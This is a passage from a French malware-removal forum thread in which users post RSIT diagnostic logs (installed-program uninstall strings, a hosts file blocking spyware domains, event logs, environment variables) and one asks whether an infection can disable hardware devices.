    SonicStage 4.3-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\10\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{A0EB195B-5876-48E6-879D-33D4B2102610}\setup.exe" -l0x40c UNINSTALL -removeonly
    Spybot - Search & Destroy-->"C:\Program Files\Spybot - Search & Destroy\unins000.exe"
    Steam-->MsiExec.exe /X{048298C9-A4D3-490B-9FF9-AB023A9238F3}
    SUPER © Version 2009.bld.35 (Jan 5, 2009)-->C:\PROGRA~1\ERIGHT~1\SUPER\Setup.exe /remove /q0
    Synaptics Pointing Device Driver-->rundll32.exe "C:\Program Files\Synaptics\SynTP\SynISDLL.dll",standAloneUninstall
    System Requirements Lab-->MsiExec.exe /I{1E99F5D7-4262-4C7C-9135-F066E7485811}
    Tom Clancy's Ghost Recon Advanced Warfighter® 2-->"C:\Program Files\InstallShield Installation Information\{F78AC3C0-578C-49AB-BD4E-3107A6036A13}\Setup.exe" -runfromtemp -l0x040c -removeonly
    TOSHIBA ConfigFree-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\0701\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{BDD83DC9-BEE9-4654-A5DA-CC46C250088D}\setup.exe" -l0x40c UNINSTALL
    TOSHIBA Direct Disc Writer-->MsiExec.exe /X{400830CA-F056-4BBE-80A3-9DF9CA4FB889}
    TOSHIBA Disc Creator-->MsiExec.exe /X{5DA0E02F-970B-424B-BF41-513A5018E4C0}
    TOSHIBA Hotkey Utility-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\09\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{07F58BB0-50D4-4477-B491-A97B2AD059B6}\setup.exe" -l0x40c
    Toshiba Online Product Information-->C:\Program Files\InstallShield Installation Information\{2290A680-4083-410A-ADCC-7092C67FC052}\setup.exe -runfromtemp -l0x040c -removeonly
    TOSHIBA SD Memory Utilities-->MsiExec.exe /X{EBFF48F5-3CFA-436F-8FD5-94FB01D3A0A7}
    TOSHIBA Software Modem-->Tosmreg -U
    TOSHIBA TouchPad ON/Off Utility-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\09\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{C02A6D5F-0FE1-46DE-B483-2BD33A226BCF}\setup.exe" -l0x40c
    TOSHIBA Utilities-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\09\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{61B84435-7A82-4F5C-87EC-1071EC28D72D}\setup.exe" -l0x40c
    TuneUp Utilities-->C:\Program Files\TuneUp Utilities 2010\TUInstallHelper.exe --Trigger-Uninstall
    Ultra AVI Converter 5.2.0102-->"C:\Program Files\Ultra AVI Converter\unins000.exe"
    Unlocker 1.8.7-->C:\Program Files\Unlocker\uninst.exe
    Update for Microsoft .NET Framework 3.5 SP1 (KB963707)-->C:\WINDOWS\system32\msiexec.exe /package {CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9} /uninstall {B2AE9C82-DC7B-3641-BFC8-87275C4F3607} /qb+ REBOOTPROMPT=""
    Utilitaire de zoom TOSHIBA-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\10\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{64212898-097F-4F3F-AECA-6D34A7EF82DF}\setup.exe" -l0x40c -removeonly
    VLC media player 0.9.8a-->C:\Program Files\VideoLAN\VLC\uninstall.exe
    Wallpaper-->C:\Program Files\Wallpaper\uninst.exe
    WBFS Manager 3.0-->C:\Program Files\WBFS\WBFS Manager 3.0\uninstall.exe
    Windows Internet Explorer 8-->"C:\WINDOWS\ie8\spuninst\spuninst.exe"
    Windows Live Call-->MsiExec.exe /I{82C7B308-0BDD-49D8-8EA5-9CD3A3F9DF41}
    Windows Live Communications Platform-->MsiExec.exe /I{ED00D08A-3C5F-488D-93A0-A04F21F23956}
    Windows Live Messenger-->MsiExec.exe /X{770F1BEC-2871-4E70-B837-FB8525FFA3B1}
    Windows Media Format 11 runtime-->"C:\Program Files\Windows Media Player\wmsetsdk.exe" /UninstallAll
    Windows Media Format 11 runtime-->"C:\WINDOWS\$NtUninstallWMFDist11$\spuninst\spuninst.exe"
    Windows Media Player 11-->"C:\WINDOWS\$NtUninstallwmp11$\spuninst\spuninst.exe"
    World in Conflict-->C:\Program Files\InstallShield Installation Information\{F11ADC64-C89E-47F4-A0B3-3665FF859397}\setup.exe -runfromtemp -l0x0009 -removeonly
    XML Paper Specification Shared Components Language Pack 1.0-->"C:\WINDOWS\$NtUninstallXPSEPSCLP$\spuninst\spuninst.exe"

    ======Hosts File======

    127.0.0.1 localhost
    127.0.0.1 www.007guard.com
    127.0.0.1 007guard.com
    127.0.0.1 008i.com
    127.0.0.1 www.008k.com
    127.0.0.1 008k.com
    127.0.0.1 www.00hq.com
    127.0.0.1 00hq.com
    127.0.0.1 010402.com
    127.0.0.1 www.032439.com

    ======Security center information======

    AV: avast! antivirus 4.8.1368 [VPS 100117-1]

    ======System event log======

    Computer Name: THIBAUT
    Event Code: 7036
    Message: Le service est entré dans l'état : Intel(R) PRO/Wireless 3945BG Network Connection.

    Record Number: 37193
    Source Name: NETw4x32
    Time Written: 20091230114626.000000+060
    Event Type: Informations
    User:

    Computer Name: THIBAUT
    Event Code: 8033
    Message: L'explorateur a forcé une élection sur le réseau \Device\NetBT_Tcpip_{3C86DC11-D9CD-4C9F-88A2-769873586B4F} car un maître explorateur a été arrêté.

    Record Number: 37192
    Source Name: BROWSER
    Time Written: 20091230114624.000000+060
    Event Type: Informations
    User:

    Computer Name: THIBAUT
    Event Code: 7036
    Message: Le service HTTP SSL est entré dans l'état : en cours d'exécution.

    Record Number: 37191
    Source Name: Service Control Manager
    Time Written: 20091230114558.000000+060
    Event Type: Informations
    User:

    Computer Name: THIBAUT
    Event Code: 7035
    Message: Un contrôle Démarrer a correctement été envoyé au service HTTP SSL.

    Record Number: 37190
    Source Name: Service Control Manager
    Time Written: 20091230114558.000000+060
    Event Type: Informations
    User: AUTORITE NT\SERVICE LOCAL

    Computer Name: THIBAUT
    Event Code: 7036
    Message: Le service Service de la passerelle de la couche Application est entré dans l'état : en cours d'exécution.

    Record Number: 37189
    Source Name: Service Control Manager
    Time Written: 20091230114548.000000+060
    Event Type: Informations
    User:

    =====Application event log=====

    Computer Name: THIBAUT
    Event Code: 1005
    Message: Windows Installer a initié un redémarrage système afin de terminer ou de continuer la configuration de 'Microsoft .NET Framework 2.0 Service Pack 2'.

    Record Number: 7232
    Source Name: MsiInstaller
    Time Written: 20091110174911.000000+060
    Event Type: Informations
    User: THIBAUT\thibaut

    Computer Name: THIBAUT
    Event Code: 11728
    Message: Produit : Microsoft .NET Framework 2.0 Service Pack 2 -- La configuration s'est terminée correctement.

    Record Number: 7231
    Source Name: MsiInstaller
    Time Written: 20091110174911.000000+060
    Event Type: Informations
    User: THIBAUT\thibaut

    Computer Name: THIBAUT
    Event Code: 1022
    Message: Produit : Microsoft .NET Framework 2.0 Service Pack 2 - La mise à jour 'KB974417' a été installée.

    Record Number: 7230
    Source Name: MsiInstaller
    Time Written: 20091110174911.000000+060
    Event Type: Informations
    User: THIBAUT\thibaut

    Computer Name: THIBAUT
    Event Code: 1002
    Message: Les compteurs de performances pour le service .NETFramework (.NETFramework) existent déjà dans le Registre
    des performances. Il n'est pas nécessaire de les réinstaller.

    Record Number: 7229
    Source Name: LoadPerf
    Time Written: 20091110174910.000000+060
    Event Type: Informations
    User:

    Computer Name: THIBAUT
    Event Code: 1002
    Message: Les compteurs de performances pour le service .NET CLR Data (.NET CLR Data) existent déjà dans le Registre
    des performances. Il n'est pas nécessaire de les réinstaller.

    Record Number: 7228
    Source Name: LoadPerf
    Time Written: 20091110174910.000000+060
    Event Type: Informations
    User:

    ======Environment variables======

    "ComSpec"=%SystemRoot%\system32\cmd.exe
    "Path"=C:\Program Files\PC Connectivity Solution\;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Program Files\ATI Technologies\ATI.ACE\Core-StaticC:\Program Files\DMV\MaxTV4\plugins;C:\Program Files\IVT Corporation\BlueSoleil\Mobile;C:\Program Files\ATI Technologies\ATI.ACE\Core-Static
    "windir"=%SystemRoot%
    "FP_NO_HOST_CHECK"=NO
    "OS"=Windows_NT
    "PROCESSOR_ARCHITECTURE"=x86
    "PROCESSOR_LEVEL"=6
    "PROCESSOR_IDENTIFIER"=x86 Family 6 Model 15 Stepping 13, GenuineIntel
    "PROCESSOR_REVISION"=0f0d
    "NUMBER_OF_PROCESSORS"=2
    "PATHEXT"=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
    "TEMP"=%SystemRoot%\TEMP
    "TMP"=%SystemRoot%\TEMP
    "OPENSSL_CONF"=C:\OpenSSL\bin\openssl.cnf
    "RGSCLauncher"=C:\Program Files\Rockstar Games\Rockstar Games Social Club
    "RGSC"=C:\Program Files\Rockstar Games\Rockstar Games Social Club\1_0_0_0
    "tvdumpflags"=8

    -----------------EOF-----------------
    0
  3. furfande
     
    Bonsoir, tout d'abord merci d'avoir pris le temps de chercher une solution ^^
    avant de poster les rapports j'ai une question: es-ce possible que le virus s'attaque à mes peripheriques ?
    Depuis quelques jours, certains péripheriques système ne fonctionnent plus d'après le gestionnaire de péripheriques, j'ai pu corriger certains mais c'est chiant à la fin.

    Rapport toolscleaner :
    (j'ai mal quitté, j'ai pas eu de log mais il a suprimmé Hijackthis et ses raccouris seulement -_-)

    Rapport RSIT info.txt :
    info.txt logfile of random's system information tool 1.06 2010-01-17 19:06:35

    ======Uninstall list======

    -->C:\Program Files\InstallShield Installation Information\{FFF8B41E-FB72-4F03-B67E-DB2D5163694D}\{00ABCDEF-2006-0000-0000-B60040153000}\setup.exe -runfromtemp -l0x040c -removeonly
    -->C:\WINDOWS\IsUn040c.exe -fC:\WINDOWS\orun32.isu
    -->MsiExec /X{74224F8D-4A17-4816-9EDB-7BB854DE532C}
    -->rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 C:\WINDOWS\INF\PCHealth.inf
    µTorrent-->"C:\Program Files\uTorrent\uTorrent.exe" /UNINSTALL
    Activation Assistant for the 2007 Microsoft Office suites-->"C:\Documents and Settings\All Users\Application Data\{174892B1-CBE7-44F5-86FF-AB555EFD73A3}\Microsoft Office Activation Assistant.exe" REMOVE=TRUE MODIFY=FALSE
    Adobe AIR-->c:\Program Files\Fichiers communs\Adobe AIR\Versions\1.0\Resources\Adobe AIR Updater.exe -arp:uninstall
    Adobe AIR-->MsiExec.exe /I{A2BCA9F1-566C-4805-97D1-7FDC93386723}
    Adobe Anchor Service CS4-->MsiExec.exe /I{1618734A-3957-4ADD-8199-F973763109A8}
    Adobe Flash Player 10 ActiveX-->C:\WINDOWS\system32\Macromed\Flash\uninstall_activeX.exe
    Adobe Flash Player 10 Plugin-->C:\WINDOWS\system32\Macromed\Flash\uninstall_plugin.exe
    Adobe Photoshop CS4-->C:\Program Files\Fichiers communs\Adobe\Installers\faf656ef605427ee2f42989c3ad31b8\Setup.exe --uninstall=1
    Adobe Reader 7.0.8-->MsiExec.exe /I{AC76BA86-7AD7-1033-7B44-A70800000002}
    Adobe Setup-->MsiExec.exe /I{0D67A4E4-5BE0-4C9A-8AD8-AB552B433F23}
    Adobe Shockwave Player 11-->C:\WINDOWS\system32\adobe\SHOCKW~1\UNWISE.EXE C:\WINDOWS\system32\Adobe\SHOCKW~1\Install.log
    Antidote RX v7-->MsiExec.exe /X{A474EA56-5DBD-4181-8230-806A4762EA7F}
    Archiveur WinRAR-->C:\Program Files\WinRAR\uninstall.exe
    ArmA 2 Uninstall-->C:\Program files\Bohemia Interactive\ArmA 2\UnInstall.exe
    Assist TOSHIBA-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{12B3A009-A080-4619-9A2A-C6DB151D8D67}\Setup.exe" -l0x40c
    Assistant de connexion Windows Live-->MsiExec.exe /I{D3116CC7-24DC-4CA3-9CE1-23FED836E9F2}
    ATI - Utilitaire de désinstallation du logiciel-->C:\Program Files\ATI Technologies\UninstallAll\AtiCimUn.exe
    ATI Catalyst Control Center-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\09\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{055EE59D-217B-43A7-ABFF-507B966405D8}\setup.exe" -l0x0
    ATI Display Driver-->rundll32 C:\WINDOWS\system32\atiiiexx.dll,_InfEngUnInstallINFFile_RunDLL@16 -force_restart -flags:0x2010001 -inf_class:DISPLAY -clean
    ATI Parental Control & Encoder-->MsiExec.exe /I{36CDA33B-909B-4719-97D1-C4B99309BDC7}
    avast! Antivirus-->C:\Program Files\Alwil Software\Avast4\aswRunDll.exe "C:\Program Files\Alwil Software\Avast4\Setup\setiface.dll",RunSetup
    AviSynth 2.5-->"C:\Program Files\AviSynth 2.5\Uninstall.exe"
    Battlefield 2(TM)-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\10\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{04858915-9F49-4B2A-AED4-DC49A7DE6A7B}\setup.exe" -l0x40c -removeonly
    Battlestations: Pacific-->MsiExec.exe /I{BBAB6D5D-1DD4-4D46-B5D9-121DCAB17DEC}
    Bluesoleil 6.2.227.11-->MsiExec.exe /X{679068CA-C9E9-4C22-A90D-2C4F2881EF9C}
    Bluetooth Monitor 4-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\10\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{61539202-097E-487E-9237-B291AB56D54C}\setup.exe" -l0x9 -removeonly
    Brothers in Arms: Hell's Highway-->C:\Program Files\Ubisoft\Gearbox Software\Brothers in Arms - Hell's Highway\Binaries\uninst.exe
    Call of Duty Modern Warfare 2-->"C:\Program Files\Call of Duty Modern Warfare 2\unins000.exe"
    Call of Duty(R) - World at War(TM) 1.1 Patch-->C:\Program Files\InstallShield Installation Information\{AFAE2B15-89A0-4215-A030-F7B5B478886B}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.2 Patch-->C:\Program Files\InstallShield Installation Information\{2BF0AE92-C3BC-4112-9066-1546342B1FAE}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.3 Patch-->C:\Program Files\InstallShield Installation Information\{149464D9-B06F-4505-9968-FD1206F67AD3}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.4 Patch-->C:\Program Files\InstallShield Installation Information\{9F01A67B-7D67-482F-9D4F-D5980A440FD4}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.5 Patch-->C:\Program Files\InstallShield Installation Information\{C3DC2DF5-EFAC-4055-9010-31F7C545DD9E}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.6 Patch-->C:\Program Files\InstallShield Installation Information\{064DC64E-7A2F-4FDF-B598-E3C0747BBB9C}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM) 1.7 Patch-->C:\Program Files\InstallShield Installation Information\{750C87B8-AF19-4C3C-B791-50D9C83AE572}\setup.exe -runfromtemp -l0x0409
    Call of Duty(R) - World at War(TM)-->C:\Program Files\InstallShield Installation Information\{D80A6A73-E58A-4673-AFF5-F12D7110661F}\setup.exe -runfromtemp -l0x040c
    Call of Duty(R) 4 - Modern Warfare(TM)-->C:\Program Files\InstallShield Installation Information\{E48469CC-635E-4FD5-A122-1497C286D217}\setup.exe -runfromtemp -l0x040c
    Call of Duty: Modern Warfare 2 - Multiplayer-->"C:\Program Files\Steam\steam.exe" steam://uninstall/10190
    Camera Assistant Software for Toshiba-->C:\Program Files\InstallShield Installation Information\{37C866E4-AA67-4725-9E95-A39968DD7960}\setup.exe -runfromtemp -l0x040c
    CamStudio 2.0 Fr-->"C:\Program Files\CamStudio\unins000.exe"
    Catalyst Control Center - Branding-->MsiExec.exe /I{98F91AF3-74BB-46E3-A9B7-48EED309C3C2}
    Chicken Invaders 3 Christmas Edition-->"C:\Program Files\Chicken Invaders 3 Christmas Edition\ReflexiveArcade\unins000.exe"
    Company of Heroes-->MsiExec.exe /X{51D718D1-DA81-4FAD-919F-5C1CE3C33379}
    Cool Beans NFO Creator 2.0.1.3-->"C:\Program Files\Cool Beans NFO Creator\unins000.exe"
    Correctif pour Windows XP (KB952287)-->"C:\WINDOWS\$NtUninstallKB952287$\spuninst\spuninst.exe"
    Crysis WARHEAD(R)-->"C:\Documents and Settings\All Users\Application Data\{0691F710-1ECA-4B5A-9727-25554F1BFDC6}\setup.exe" REMOVE=TRUE MODIFY=FALSE
    Crysis WARHEAD(R)-->C:\Documents and Settings\All Users\Application Data\{0691F710-1ECA-4B5A-9727-25554F1BFDC6}\setup.exe
    Crysis(R)-->MsiExec.exe /I{000E79B7-E725-4F01-870A-C12942B7F8E4}
    DAEMON Tools Toolbar-->C:\Program Files\DAEMON Tools Toolbar\uninst.exe
    DH Mobility Modder.NET-->C:\Program Files\MobilityDotNET\Uninstall.exe
    EA Download Manager-->C:\PROGRA~1\FICHIE~1\INSTAL~1\Driver\11\INTEL3~1\IDriver.exe /M{EF7E931D-DC84-471B-8DB6-A83358095474} /l1036
    EA Download Manager-->C:\Program Files\Electronic Arts\EADM\Uninstall.exe
    eMule-->"C:\Program Files\eMule\Uninstall.exe"
    EVEREST Ultimate Edition v5.30-->"C:\Program Files\Lavalys\EVEREST Ultimate Edition\unins000.exe"
    Fallout 3-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\11\00\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{974C4B12-4D02-4879-85E0-61C95CC63E9E}\setup.exe" -l0x9 -removeonly
    Far Cry 2-->"C:\Program Files\InstallShield Installation Information\{F2835483-37F2-4123-B4FE-0E77D58447F2}\setup.exe" -runfromtemp -l0x040c -removeonly
    FileZilla Client 3.2.8.1-->C:\Program Files\FileZilla FTP Client\uninstall.exe
    Free Download Manager 3.0-->"C:\Program Files\Free Download Manager\unins000.exe"
    Gestion d'énergie TOSHIBA-->C:\Program Files\InstallShield Installation Information\{8F7AC250-4D7D-431D-AC4E-94FB78EA3F8B}\setup.exe -runfromtemp -l0x040c -uninst -removeonly
    Google Toolbar for Internet Explorer-->MsiExec.exe /I{DBEA1034-5882-4A88-8033-81C4EF0CFA29}
    Google Toolbar for Internet Explorer-->regsvr32 /u /s "c:\program files\google\googletoolbar1.dll"
    Grand Theft Auto IV-->"C:\Program Files\InstallShield Installation Information\{579BA58C-F33D-4970-9953-B94B43768AC3}\setup.exe" -runfromtemp -l0x040c -removeonly
    GTA San Andreas-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\10\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}\setup.exe" -l0x40c -removeonly
    Half-Life 2: Episode Two-->"C:\Program Files\Steam\steam.exe" steam://uninstall/420
    Halo 2 for Windows Vista-->C:\Program Files\Microsoft Games\Halo 2\StartUp.exe /tnp:/remove
    HijackThis 2.0.2-->"C:\Program Files\Trend Micro\HijackThis\HijackThis.exe" /uninstall
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)-->C:\WINDOWS\system32\msiexec.exe /package {CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9} /uninstall /qb+ REBOOTPROMPT=""
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)-->C:\WINDOWS\system32\msiexec.exe /package {CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9} /uninstall {A7EEA2F2-BFCD-4A54-A575-7B81A786E658} /qb+ REBOOTPROMPT=""
    HP Customer Participation Program 7.0-->C:\Program Files\HP\Digital Imaging\ExtCapUninstall\hpzscr01.exe -datfile hpqhsc01.dat
    HP Document Viewer 7.0-->C:\Program Files\HP\Digital Imaging\DocumentViewer\hpzscr01.exe -datfile hpqbud04.dat
    HP Imaging Device Functions 7.0-->C:\Program Files\HP\Digital Imaging\DeviceManagement\hpzscr01.exe -datfile hpqbud01.dat
    HP Photosmart Premier Software 6.5-->C:\Program Files\HP\Digital Imaging\uninstall\hpzscr01.exe -datfile hpqscr01.dat
    HP Photosmart, Officejet and Deskjet 7.0.A-->C:\Program Files\HP\Digital Imaging\{BDBE2F3E-42DB-4d4a-8CB1-19BA765DBC6C}\setup\hpzscr01.exe -datfile hposcr11.dat
    HP Product Assistant-->MsiExec.exe /I{36FDBE6E-6684-462B-AE98-9A39A1B200CC}
    HP Solution Center 7.0-->C:\Program Files\HP\Digital Imaging\eSupport\hpzscr01.exe -datfile hpqbud05.dat
    HP Update-->MsiExec.exe /X{FE57DE70-95DE-4B64-9266-84DA811053DB}
    ImgBurn 2.3.2.0 Fr-->"C:\Program Files\ImgBurn\unins000.exe"
    Installation Windows Live-->C:\Program Files\Windows Live\Installer\wlarp.exe
    Installation Windows Live-->MsiExec.exe /I{46ABBC54-1872-4AA3-95E2-F2C063A63F31}
    Intel(R) Graphics Media Accelerator Driver-->C:\WINDOWS\system32\igxpun.exe -uninstall
    Intel(R) Matrix Storage Manager-->C:\WINDOWS\System32\Imsmudlg.exe
    InterVideo WinDVD for TOSHIBA-->"C:\Program Files\InstallShield Installation Information\{91810AFC-A4F8-4EBA-A5AA-B198BBC81144}\setup.exe" REMOVEALL
    Java(TM) 6 Update 16-->MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216016FF}
    Java(TM) 6 Update 3-->MsiExec.exe /I{3248F0A8-6813-11D6-A77B-00B0D0160030}
    K-Lite Codec Pack 4.6.2 (Full)-->"C:\Program Files\K-Lite Codec Pack\unins000.exe"
    Lecteur Windows Media 11-->"C:\Program Files\Windows Media Player\Setup_wm.exe" /Uninstall
    Left 4 Dead 2-->"C:\Program Files\Steam\steam.exe" steam://uninstall/550
    Logitech Gaming Software 5.08-->MsiExec.exe /X{33BC9D7E-E790-495E-A4EA-CFB160C17A91}
    Ma-Config.com-->MsiExec.exe /X{6240A334-46DA-453D-B8F7-C7AB8448CCE4}
    Macromedia Flash Player-->MsiExec.exe /X{0456ebd7-5f67-4ab6-852e-63781e3f389c}
    Malwarebytes' Anti-Malware-->"C:\Program Files\Malwarebytes' Anti-Malware\unins000.exe"
    Manuels TOSHIBA-->C:\Program Files\InstallShield Installation Information\{5B1DD5AA-FF34-4D6E-A912-CB46BB7378DC}\setup.exe -runfromtemp -l0x040c -removeonly
    MediaInfo 0.7.19-->C:\Program Files\MediaInfo\uninst.exe
    Mega Manager-->C:\Program Files\InstallShield Installation Information\{3B6E3FC6-274C-4B6C-BC85-5C3B15DE18E2}\setup.exe -runfromtemp -l0x0009 -removeonly
    Microsoft .NET Framework 1.1 French Language Pack-->MsiExec.exe /X{9A394342-4A68-4EBA-85A6-55B559F4E700}
    Microsoft .NET Framework 1.1 Security Update (KB953297)-->"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Updates\hotfix.exe" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Updates\M953297\M953297Uninstall.msp"
    Microsoft .NET Framework 1.1-->MsiExec.exe /X{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}
    Microsoft .NET Framework 2.0 Service Pack 2-->MsiExec.exe /I{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}
    Microsoft .NET Framework 3.0 Service Pack 2-->MsiExec.exe /I{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}
    Microsoft .NET Framework 3.5 SP1-->C:\WINDOWS\Microsoft.NET\Framework\v3.5\Microsoft .NET Framework 3.5 SP1\setup.exe
    Microsoft .NET Framework 3.5 SP1-->MsiExec.exe /I{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}
    Microsoft Choice Guard-->MsiExec.exe /X{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}
    Microsoft Games for Windows - LIVE -->MsiExec.exe /X{4D243BA7-9AC4-46D1-90E5-EEB88974F501}
    Microsoft Games for Windows - LIVE Redistributable-->MsiExec.exe /X{05B49229-22A2-4F88-842A-BBC2EBE1CCF6}
    Microsoft Halo-->"C:\Program Files\Microsoft Games\Halo\UNINSTAL.EXE" /runtemp /addremove
    Microsoft Internationalized Domain Names Mitigation APIs-->"C:\WINDOWS\$NtServicePackUninstallIDNMitigationAPIs$\spuninst\spuninst.exe"
    Microsoft National Language Support Downlevel APIs-->"C:\WINDOWS\$NtServicePackUninstallNLSDownlevelMapping$\spuninst\spuninst.exe"
    Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053-->MsiExec.exe /X{770657D0-A123-3C07-8E44-1C83EC895118}
    Microsoft Visual C++ 2005 Redistributable-->MsiExec.exe /X{7299052b-02a4-4627-81f2-1818da5d550d}
    Mise à jour de sécurité pour Lecteur Windows Media (KB952069)-->"C:\WINDOWS\$NtUninstallKB952069_WM9$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Lecteur Windows Media 10 (KB917734)-->"C:\WINDOWS\$NtUninstallKB917734_WMP10$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Lecteur Windows Media 10 (KB936782)-->"C:\WINDOWS\$NtUninstallKB936782_WMP10$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB938127)-->"C:\WINDOWS\ie7updates\KB938127-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB938127-v2)-->"C:\WINDOWS\ie7updates\KB938127-v2-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB956390)-->"C:\WINDOWS\ie7updates\KB956390-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB958215)-->"C:\WINDOWS\ie7updates\KB958215-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB960714)-->"C:\WINDOWS\ie7updates\KB960714-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 8 (KB969897)-->"C:\WINDOWS\ie8updates\KB969897-IE8\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 8 (KB971961)-->"C:\WINDOWS\ie8updates\KB971961-IE8\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 8 (KB972260)-->"C:\WINDOWS\ie8updates\KB972260-IE8\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 8 (KB974455)-->"C:\WINDOWS\ie8updates\KB974455-IE8\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 8 (KB976325)-->"C:\WINDOWS\ie8updates\KB976325-IE8\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB938464)-->"C:\WINDOWS\$NtUninstallKB938464$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB946648)-->"C:\WINDOWS\$NtUninstallKB946648$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB950762)-->"C:\WINDOWS\$NtUninstallKB950762$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB950974)-->"C:\WINDOWS\$NtUninstallKB950974$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951066)-->"C:\WINDOWS\$NtUninstallKB951066$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951376-v2)-->"C:\WINDOWS\$NtUninstallKB951376-v2$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951698)-->"C:\WINDOWS\$NtUninstallKB951698$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951748)-->"C:\WINDOWS\$NtUninstallKB951748$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB952954)-->"C:\WINDOWS\$NtUninstallKB952954$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB954211)-->"C:\WINDOWS\$NtUninstallKB954211$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB954600)-->"C:\WINDOWS\$NtUninstallKB954600$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB955069)-->"C:\WINDOWS\$NtUninstallKB955069$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB956802)-->"C:\WINDOWS\$NtUninstallKB956802$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB956803)-->"C:\WINDOWS\$NtUninstallKB956803$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB956841)-->"C:\WINDOWS\$NtUninstallKB956841$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB957095)-->"C:\WINDOWS\$NtUninstallKB957095$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB957097)-->"C:\WINDOWS\$NtUninstallKB957097$\spuninst\spuninst.exe"
